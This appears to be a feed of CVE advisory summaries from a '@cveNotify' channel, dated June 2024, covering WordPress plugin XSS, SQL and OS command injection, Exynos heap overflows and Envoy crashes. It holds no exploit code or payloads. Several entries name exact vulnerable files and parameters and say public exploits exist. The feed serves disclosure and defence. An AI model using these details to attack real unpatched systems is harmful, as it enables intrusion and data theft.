🚨 CVE-2024-5342The Simple Image Popup Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sips_popup' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 02:37:36 |
🚨 CVE-2024-5224The Easy Social Like Box – Popup – Sidebar Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cardoza_facebook_like_box' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 02:37:35 |
🚨 CVE-2024-5179The Cowidgets – Elementor Addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.1 via the 'item_style' and 'style' parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-06-06 02:37:32 |
🚨 CVE-2024-5001The Image Hover Effects for Elementor with Lightbox and Flipbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_id', 'oxi_addons_f_title_tag', and 'content_description_tag' parameters in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-06 02:37:31 |
🚨 CVE-2024-4788The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_bhf_post function in all versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to create pages or posts with arbitrary content.🎖@cveNotify |
|
| 2024-06-06 02:37:30 |
🚨 CVE-2024-4194The The Album and Image Gallery plus Lightbox plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-06-06 02:37:26 |
🚨 CVE-2024-0910The Restrict for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.6 due to improper restrictions on hidden data that make it accessible through the REST API. This makes it possible for unauthenticated attackers to extract potentially sensitive data from post content.🎖@cveNotify |
|
| 2024-06-06 02:37:25 |
🚨 CVE-2023-6966The The Moneytizer plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on multiple AJAX functions in the /core/core_ajax.php file in all versions up to, and including, 9.5.20. This makes it possible for authenticated attackers, with subscriber access and above, to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions.🎖@cveNotify |
|
| 2024-06-06 02:37:24 |
🚨 CVE-2023-6956The EasyAzon – Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘easyazon-cloaking-locale’ parameter in all versions up to, and including, 5.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-06 00:37:24 |
🚨 CVE-2024-0912Under certain circumstances the Microsoft® Internet Information Server (IIS) used to host the C•CURE 9000 Web Server will log Microsoft Windows credential details within logs. There is no impact to non-web service interfaces C•CURE 9000 or prior versions🎖@cveNotify |
|
| 2024-06-05 23:37:24 |
🚨 CVE-2024-2197The Chirp Access app contains a hard-coded password, BEACON_PASSWORD. An attacker within Bluetooth range could change configuration settings within the Bluetooth beacon, effectively disabling the application's ability to notify users when they are near a Beacon-enabled access point. This variable cannot be used to change the configuration settings of the door readers or locksets and does not affect the ability for authorized users of the mobile application to lock or unlock access points.🎖@cveNotify |
|
| 2024-06-05 21:37:41 |
🚨 CVE-2024-5653A vulnerability, which was classified as critical, has been found in Chanjet Smooth T+system 3.5. This issue affects some unknown processing of the file /tplus/UFAQD/keyEdit.aspx. The manipulation of the argument KeyID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-05 21:37:38 |
🚨 CVE-2023-5462A vulnerability was found in XINJE XD5E-30R-E 3.5.3b. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Modbus Handler. The manipulation leads to denial of service. The exploit has been disclosed to the public and may be used. The identifier VDB-241585 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-05 21:37:37 |
🚨 CVE-2023-5283A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file teacher_signup.php. The manipulation of the argument firstname/lastname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240911.🎖@cveNotify |
|
| 2024-06-05 21:37:36 |
🚨 CVE-2023-5257A vulnerability was found in WhiteHSBG JNDIExploit 1.4 on Windows. It has been rated as problematic. Affected by this issue is the function handleFileRequest of the file src/main/java/com/feihong/ldap/HTTPServer.java. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. VDB-240866 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-05 21:37:32 |
🚨 CVE-2023-5017A vulnerability was found in lmxcms up to 1.41. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin.php. The manipulation of the argument lid leads to sql injection. VDB-239858 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-05 21:37:31 |
🚨 CVE-2023-4974A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-05 21:37:30 |
🚨 CVE-2023-36308disintegration Imaging 1.6.2 allows attackers to cause a panic (because of an integer index out of range during a Grayscale call) via a crafted TIFF file to the scan function of scanner.go. NOTE: it is unclear whether there are common use cases in which this panic could have any security consequence🎖@cveNotify |
|
| 2024-06-05 21:37:26 |
🚨 CVE-2023-4711A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-05 21:37:25 |
🚨 CVE-2023-36631Lack of access control in wfc.exe in Malwarebytes Binisoft Windows Firewall Control 6.9.2.0 allows local unprivileged users to bypass Windows Firewall restrictions via the user interface's rules tab. NOTE: the vendor's perspective is "this is intended behavior as the application can be locked using a password."🎖@cveNotify |
|
| 2024-06-05 21:37:24 |
🚨 CVE-2023-33546Janino 3.1.9 and earlier are subject to denial of service (DOS) attacks when using the expression evaluator.guess parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow. NOTE: this is disputed by multiple parties because Janino is not intended for use with untrusted input.🎖@cveNotify |
|
| 2024-06-05 20:07:26 |
🚨 CVE-2024-0756The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page.🎖@cveNotify |
|
| 2024-06-05 20:07:25 |
🚨 CVE-2024-35668Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brevo Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue allows Reflected XSS.This issue affects Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue: from n/a through 3.1.77.🎖@cveNotify |
|
| 2024-06-05 20:07:24 |
🚨 CVE-2024-35666Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themesflat Themesflat Addons For Elementor allows Stored XSS.This issue affects Themesflat Addons For Elementor: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-06-05 19:37:43 |
🚨 CVE-2024-28818An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 2200, 1280, 1380, 1330, 2400, 9110, W920, W930, Modem 5123, Modem 5300, and Auto T5123. The baseband software does not properly check states specified by the RRC (Radio Resource Control) module. This can lead to disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-05 19:37:42 |
🚨 CVE-2024-27381An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_send_action_frame_ut(), there is no input validation check on len coming from userspace, which can lead to a heap over-read.🎖@cveNotify |
|
| 2024-06-05 19:37:41 |
🚨 CVE-2024-27380An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_set_delayed_wakeup_type(), there is no input validation check on a length of ioctl_args->args[i] coming from userspace, which can lead to a heap over-read.🎖@cveNotify |
|
| 2024-06-05 19:37:38 |
🚨 CVE-2024-27379An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_subscribe_get_nl_params(), there is no input validation check on hal_req->num_intf_addr_present coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-05 19:37:37 |
🚨 CVE-2024-27377An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_get_security_info_nl(), there is no input validation check on sec_info->key_info.body.pmk_info.pmk_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-05 19:37:36 |
🚨 CVE-2024-27375An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_followup_get_nl_params(), there is no input validation check on hal_req->sdea_service_specific_info_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-05 19:37:32 |
🚨 CVE-2024-27374An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_publish_get_nl_params(), there is no input validation check on hal_req->service_specific_info_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-05 19:37:31 |
🚨 CVE-2024-27371An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_followup_get_nl_params(), there is no input validation check on hal_req->service_specific_info_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-05 19:37:30 |
🚨 CVE-2024-27370An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_config_get_nl_params(), there is no input validation check on hal_req->num_config_discovery_attr coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-05 18:37:26 |
🚨 CVE-2024-5037A flaw was found in OpenShift's Telemeter. If certain conditions are in place, an attacker can use a forged token to bypass the issue ("iss") check during JSON web token (JWT) authentication.🎖@cveNotify |
|
| 2024-06-05 18:37:25 |
🚨 CVE-2024-4008FDSK Leak in ABB, Busch-Jaeger, FTS Display (version 1.00) and BCU (version 1.3.0.33) allows attacker to take control via access to local KNX Bus-System🎖@cveNotify |
|
| 2024-06-05 18:37:24 |
🚨 CVE-2024-36129The OpenTelemetry Collector offers a vendor-agnostic implementation on how to receive, process and export telemetry data. An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption. OTel Collector version 0.102.1 fixes this issue. It is also fixed in the confighttp module version 0.102.0 and configgrpc module version 0.102.1.🎖@cveNotify |
|
| 2024-06-05 16:37:37 |
🚨 CVE-2024-24789The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create an zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.🎖@cveNotify |
|
| 2024-06-05 13:38:28 |
🚨 CVE-2024-5459The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to unauthorized creation of data due to a missing capability check on 'add_section', 'add_menu', 'add_menu_item', and 'add_menu_page' functions in all versions up to, and including, 2.4.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create menu sections, menus, food items, and new menu pages.🎖@cveNotify |
|
| 2024-06-05 13:38:24 |
🚨 CVE-2024-3469The GP Premium plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the message parameter in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-05 13:38:23 |
🚨 CVE-2024-4232This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to lack of encryption or hashing in storing of passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext passwords on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.🎖@cveNotify |
|
| 2024-06-05 13:38:22 |
🚨 CVE-2024-2257This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating password that do not adhere to the defined security standards/policy on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats.🎖@cveNotify |
|
| 2024-06-05 13:07:50 |
🚨 CVE-2024-34362Envoy is a cloud-native, open source edge and service proxy. There is a use-after-free in `HttpConnectionManager` (HCM) with `EnvoyQuicServerStream` that can crash Envoy. An attacker can exploit this vulnerability by sending a request without `FIN`, then a `RESET_STREAM` frame, and then after receiving the response, closing the connection.🎖@cveNotify |
|
| 2024-06-05 13:07:49 |
🚨 CVE-2024-32975Envoy is a cloud-native, open source edge and service proxy. There is a crash at `QuicheDataReader::PeekVarInt62Length()`. It is caused by integer underflow in the `QuicStreamSequencerBuffer::PeekRegion()` implementation.🎖@cveNotify |
|
| 2024-06-05 13:07:48 |
🚨 CVE-2024-23326Envoy is a cloud-native, open source edge and service proxy. A theoretical request smuggling vulnerability exists through Envoy if a server can be tricked into adding an upgrade header into a response. Per RFC https://www.rfc-editor.org/rfc/rfc7230#section-6.7 a server sends 101 when switching protocols. Envoy incorrectly accepts a 200 response from a server when requesting a protocol upgrade, but 200 does not indicate protocol switch. This opens up the possibility of request smuggling through Envoy if the server can be tricked into adding the upgrade header to the response.🎖@cveNotify |
|
| 2024-06-05 13:07:44 |
🚨 CVE-2024-4520An improper access control vulnerability exists in the gaizhenbiao/chuanhuchatgpt application, specifically in version 20240410. This vulnerability allows any user on the server to access the chat history of any other user without requiring any form of interaction between the users. Exploitation of this vulnerability could lead to data breaches, including the exposure of sensitive personal details, financial data, or confidential conversations. Additionally, it could facilitate identity theft and manipulation or fraud through the unauthorized access to users' chat histories. This issue is due to insufficient access control mechanisms in the application's handling of chat history data.🎖@cveNotify |
|
| 2024-06-05 13:07:43 |
🚨 CVE-2024-30525Missing Authorization vulnerability in moveaddons Move Addons for Elementor.This issue affects Move Addons for Elementor: from n/a through 1.2.9.🎖@cveNotify |
|
| 2024-06-05 13:07:42 |
🚨 CVE-2024-28103Action Pack is a framework for handling and responding to web requests. Since 6.1.0, the application configurable Permissions-Policy is only served on responses with an HTML related Content-Type. This vulnerability is fixed in 6.1.7.8, 7.0.8.2, and 7.1.3.3.🎖@cveNotify |
|
| 2024-06-05 13:07:39 |
🚨 CVE-2024-37273An arbitrary file upload vulnerability in the /v1/app/appendFileSync interface of Jan v0.4.12 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2024-06-05 13:07:38 |
🚨 CVE-2024-36857Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.🎖@cveNotify |
|
| 2024-06-05 13:07:37 |
🚨 CVE-2024-35672Missing Authorization vulnerability in Netgsm.This issue affects Netgsm: from n/a through 2.9.16.🎖@cveNotify |
|
| 2024-06-05 13:07:33 |
🚨 CVE-2024-35670Broken Authentication vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.93.🎖@cveNotify |
|
| 2024-06-05 13:07:32 |
🚨 CVE-2024-29152An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 2200, 1280, 1380, 1330, 2400, 9110, W920, W930, Modem 5123, Modem 5300, and Auto T5123. The baseband software does not properly check states specified by the RRC (Radio Resource Control) Reconfiguration message. This can lead to disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-05 13:07:31 |
🚨 CVE-2024-25095Insertion of Sensitive Information into Log File vulnerability in Code Parrots Easy Forms for Mailchimp.This issue affects Easy Forms for Mailchimp: from n/a through 6.9.0.🎖@cveNotify |
|
| 2024-06-05 11:37:25 |
🚨 CVE-2024-4001The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_modal_login_form' shortcode in all versions up to, and including, 3.2.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 11:37:24 |
🚨 CVE-2024-31380Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Oxygen Builder allows Code Injection.This issue affects Oxygen Builder: from n/a through 4.8.3.🎖@cveNotify |
|
| 2024-06-05 10:37:48 |
🚨 CVE-2024-5536The GamiPress – Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's gamipress_link shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 09:37:31 |
🚨 CVE-2024-4821The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_lightbox shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 09:37:30 |
🚨 CVE-2024-1272Inclusion of Sensitive Information in Source Code vulnerability in TNB Mobile Solutions Cockpit Software allows Retrieve Embedded Sensitive Data.This issue affects Cockpit Software: before v0.251.1.🎖@cveNotify |
|
| 2024-06-05 08:37:59 |
🚨 CVE-2024-5439The Blocksy theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the custom_url parameter in all versions up to, and including, 2.0.50 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-05 08:37:58 |
🚨 CVE-2024-23669An improper authorization in Fortinet FortiWebManager version 7.2.0 and 7.0.0 through 7.0.4 and 6.3.0 and 6.2.3 through 6.2.4 and 6.0.2 allows attacker to execute unauthorized code or commands via HTTP requests or CLI.🎖@cveNotify |
|
| 2024-06-05 07:37:25 |
🚨 CVE-2024-2368The Mollie Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.13. This is due to missing or incorrect nonce validation on the duplicateForm() function. This makes it possible for unauthenticated attackers to duplicate forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-05 07:37:24 |
🚨 CVE-2024-1164The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's contact form widget error message and redirect URL in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping on user supplied error messages. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 06:37:32 |
🚨 CVE-2024-3667The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' field of multiple widgets in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 06:37:26 |
🚨 CVE-2024-2087The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form name values in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 06:37:25 |
🚨 CVE-2024-29974** UNSUPPORTED WHEN ASSIGNED **The remote code execution vulnerability in the CGI program “file_upload-cgi” in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute arbitrary code by uploading a crafted configuration file to a vulnerable device.🎖@cveNotify |
|
| 2024-06-05 06:37:24 |
🚨 CVE-2024-29972** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-05 05:37:30 |
🚨 CVE-2024-5149The BuddyForms plugin for WordPress is vulnerable to Email Verification Bypass in all versions up to, and including, 2.8.9 via the use of an insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification.🎖@cveNotify |
|
| 2024-06-05 05:37:27 |
🚨 CVE-2024-34055Cyrus IMAP before 3.8.3 and 3.10.x before 3.10.0-rc1 allows authenticated attackers to cause unbounded memory allocation by sending many LITERALs in a single command.🎖@cveNotify |
|
| 2024-06-05 05:37:26 |
🚨 CVE-2024-0340A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file.🎖@cveNotify |
|
| 2024-06-05 05:37:25 |
🚨 CVE-2022-30332In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.🎖@cveNotify |
|
| 2024-06-05 05:37:24 |
🚨 CVE-2020-14016An issue was discovered in Navigate CMS 2.9 r1433. The forgot-password feature allows users to reset their passwords by using either their username or the email address associated with their account. However, the feature returns a not_found message when the provided username or email address does not match a user in the system. This can be used to enumerate users.🎖@cveNotify |
|
| 2024-06-05 04:37:33 |
🚨 CVE-2024-29975** UNSUPPORTED WHEN ASSIGNED **The improper privilege management vulnerability in the SUID executable binary in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an authenticated local attacker with administrator privileges to execute some system commands as the “root” user on a vulnerable device.🎖@cveNotify |
|
| 2024-06-05 04:37:32 |
🚨 CVE-2024-29972** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-05 03:37:49 |
🚨 CVE-2024-5483The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.8 due to incorrect implementation of get_items_permissions_check function. This makes it possible for unauthenticated attackers to extract basic information about website users, including their emails🎖@cveNotify |
|
| 2024-06-05 02:37:24 |
🚨 CVE-2024-5317The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'np1' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-05 01:37:24 |
🚨 CVE-2024-5636A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file report/index.php. The manipulation of the argument procduct leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267092.🎖@cveNotify |
|
| 2024-06-04 22:37:32 |
🚨 CVE-2022-28658Apport argument parsing mishandles filename splitting on older kernels resulting in argument spoofing🎖@cveNotify |
|
| 2024-06-04 22:37:25 |
🚨 CVE-2022-28655is_closing_session() allows users to create arbitrary tcp dbus connections🎖@cveNotify |
|
| 2024-06-04 22:37:24 |
🚨 CVE-2022-28652~/.config/apport/settings parsing is vulnerable to "billion laughs" attack🎖@cveNotify |
|
| 2024-06-04 21:37:30 |
🚨 CVE-2024-34364Envoy is a cloud-native, open source edge and service proxy. Envoy exposed an out-of-memory (OOM) vector from the mirror response, since async HTTP client will buffer the response with an unbounded buffer.🎖@cveNotify |
|
| 2024-06-04 21:37:29 |
🚨 CVE-2024-34363Envoy is a cloud-native, open source edge and service proxy. Due to how Envoy invoked the nlohmann JSON library, the library could throw an uncaught exception from downstream data if incomplete UTF-8 strings were serialized. The uncaught exception would cause Envoy to crash.🎖@cveNotify |
|
| 2024-06-04 21:37:26 |
🚨 CVE-2024-32976Envoy is a cloud-native, open source edge and service proxy. Envoyproxy with a Brotli filter can get into an endless loop during decompression of Brotli data with extra input.🎖@cveNotify |
|
| 2024-06-04 21:37:25 |
🚨 CVE-2024-32974Envoy is a cloud-native, open source edge and service proxy. A crash was observed in `EnvoyQuicServerStream::OnInitialHeadersComplete()` with following call stack. It is a use-after-free caused by QUICHE continuing push request headers after `StopReading()` being called on the stream. As after `StopReading()`, the HCM's `ActiveStream` might have already be destroyed and any up calls from QUICHE could potentially cause use after free.🎖@cveNotify |
|
| 2024-06-04 21:37:24 |
🚨 CVE-2024-23326Envoy is a cloud-native, open source edge and service proxy. A theoretical request smuggling vulnerability exists through Envoy if a server can be tricked into adding an upgrade header into a response. Per RFC https://www.rfc-editor.org/rfc/rfc7230#section-6.7 a server sends 101 when switching protocols. Envoy incorrectly accepts a 200 response from a server when requesting a protocol upgrade, but 200 does not indicate protocol switch. This opens up the possibility of request smuggling through Envoy if the server can be tricked into adding the upgrade header to the response.🎖@cveNotify |
|
| 2024-06-04 20:37:32 |
🚨 CVE-2024-4520An improper access control vulnerability exists in the gaizhenbiao/chuanhuchatgpt application, specifically in version 20240410. This vulnerability allows any user on the server to access the chat history of any other user without requiring any form of interaction between the users. Exploitation of this vulnerability could lead to data breaches, including the exposure of sensitive personal details, financial data, or confidential conversations. Additionally, it could facilitate identity theft and manipulation or fraud through the unauthorized access to users' chat histories. This issue is due to insufficient access control mechanisms in the application's handling of chat history data.🎖@cveNotify |
|
| 2024-06-04 20:37:31 |
🚨 CVE-2024-30528Missing Authorization vulnerability in Spiffy Plugins Spiffy Calendar.This issue affects Spiffy Calendar: from n/a through 4.9.10.🎖@cveNotify |
|
| 2024-06-04 20:37:30 |
🚨 CVE-2024-30525Missing Authorization vulnerability in moveaddons Move Addons for Elementor.This issue affects Move Addons for Elementor: from n/a through 1.2.9.🎖@cveNotify |
|
| 2024-06-04 20:37:26 |
🚨 CVE-2024-29973** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-04 20:37:25 |
🚨 CVE-2024-29972** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-04 20:37:24 |
🚨 CVE-2017-11191FreeIPA 4.x with API version 2.213 allows a remote authenticated users to bypass intended account-locking restrictions via an unlock action with an old session ID (for the same user account) that had been created for an earlier session. NOTE: Vendor states that issue does not exist in product and does not recognize this report as a valid security concern🎖@cveNotify |
|
| 2024-06-04 19:37:45 |
🚨 CVE-2018-11208An issue was discovered in Z-BlogPHP 2.0.0. There is a persistent XSS that allows remote attackers to inject arbitrary web script or HTML into background web site settings via the "copyright information office" field. NOTE: the vendor indicates that the product was not intended to block this type of XSS by a user with the admin privilege🎖@cveNotify |
|
| 2024-06-04 19:37:44 |
🚨 CVE-2017-14522In WonderCMS 2.3.1, the application's input fields accept arbitrary user input resulting in execution of malicious JavaScript. NOTE: the vendor disputes this issue stating that this is a feature that enables only a logged in administrator to write execute JavaScript anywhere on their website🎖@cveNotify |
|
